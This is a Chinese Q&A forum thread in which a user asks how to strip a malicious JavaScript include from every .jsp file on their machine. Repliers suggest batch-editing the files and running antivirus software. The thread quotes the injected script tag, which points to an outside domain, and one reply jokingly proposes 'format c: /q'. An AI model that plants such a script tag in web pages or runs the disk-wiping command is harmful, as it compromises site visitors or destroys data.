首页 新闻 赞助 找找看

.jsp文件被注入

0
悬赏园豆:20 [已解决问题] 解决于 2008-01-24 23:49
机器上所有的.jsp文件都被注入了,病素养已经删除.注入内容为:<script language=javascript src=http://qqq.qq1680.com/do结Y></script>,有没有办法删除
拐子的主页 拐子 | 初学一级 | 园豆:181
提问于:2008-01-22 22:34
< >
分享
最佳答案
0
没看明白你的意思 如果是要清除所有.jsp文件中的病毒代码,可以找个支持批量文件修改的编辑器处理这些文件中的病毒代码(推荐EmEditor,so强大) 如果是要杀毒,手工会最好,不会就找个杀毒软件杀一下(推荐卡巴斯基,虽然很烂,虽然我没装过,但其他的估计更烂) 还有别的问题吗? --------------------------------- TO 沙加: 下手好狠~~~~~~~~~~~~~
丁学 | 专家六级 |园豆:18730 | 2008-01-23 02:04
其他回答(2)
0
format c: /q ~~~;)
沙加 | 园豆:3680 (老鸟四级) | 2008-01-22 22:59
0
批量文件修改吧,以前也中过类似的病毒,网页文件都被加入这个,还好不多,手动修改,修改之前先杀毒
niugm | 园豆:1685 (小虾三级) | 2008-01-23 09:57
清除回答草稿
   您需要登录以后才能回答,未注册用户请先注册